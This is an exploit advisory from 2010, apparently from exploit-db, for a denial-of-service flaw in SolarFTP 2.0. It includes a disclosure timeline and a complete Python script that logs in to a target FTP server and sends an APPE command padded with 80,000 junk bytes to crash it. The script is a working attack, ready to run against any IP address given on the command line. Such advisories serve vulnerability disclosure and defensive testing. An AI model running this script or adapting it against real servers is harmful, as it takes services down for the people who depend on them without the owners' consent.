# Exploit Title: SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability # Date: 12/17/2010 # Author: modpr0be # Software Link: http://www.solarftp.com/files/solarftps-setup.exe # Vulnerable version: 2.0 # Tested on: Windows XP SP2, Windows XP SP3 # CVE : N/A # # ====================================================================== # ___ _ __ __ __ _ __ # ____/ (_)___ _(_) /_____ _/ / ___ _____/ /_ (_)___/ /___ ____ _ # / __ / / __ `/ / __/ __ `/ / / _ \/ ___/ __ \/ / __ / __ \/ __ `/ # / /_/ / / /_/ / / /_/ /_/ / / / __/ /__/ / / / / /_/ / / / / /_/ / # \__,_/_/\__, /_/\__/\__,_/_/ \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/ # /____/ http://www.digital-echidna.org # ====================================================================== # # Greetz: # say hello to all digital-echidna org crew: # otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix # special thx to amalia (^^), oebaj, offsec, exploit-db, corelan team # #### Software description: # Solar FTP Server is a handy and easy to use personal FTP server with # features like virtual directories, simple and intuitive user interface, # real-time activity monitoring and management. # #### Exploit information: # SolarFTP 2.0 will suddenly stop (crash) while these commands were sent: # APPE, GET, PUT, NLST, and MDTM # Sending USER with junk also crashing the Admin Configuration but not the service. # Stack contains our junk in random. Both EIP and SEH were not overwritten. # #### Other information: # 12/10/2010 - vendor contacted # 12/17/2010 - no response, advisory released
import socket, sys s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
junk = "\x41" * 80000
def banner(): print "\nSolarFTP 2.0 Multiple Commands Denial of Service Vulnerability." print "By: modpr0be (modpr0be[at]digital-echidna[dot]org)\n"
if len(sys.argv)!=4: banner() print "Usage: %s <ip> <user> <pass>\n" %sys.argv[0] sys.exit(0)
try: s.connect((sys.argv[1], 21)) except: print "Can\'t connect to server!\n" sys.exit(0) s.recv(1024) s.send('USER '+sys.argv[2]+'\r\n') s.recv(1024) s.send('PASS '+sys.argv[3]+'\r\n') s.recv(1024) s.send('APPE '+junk+'\r\n') s.recv(1024) s.close()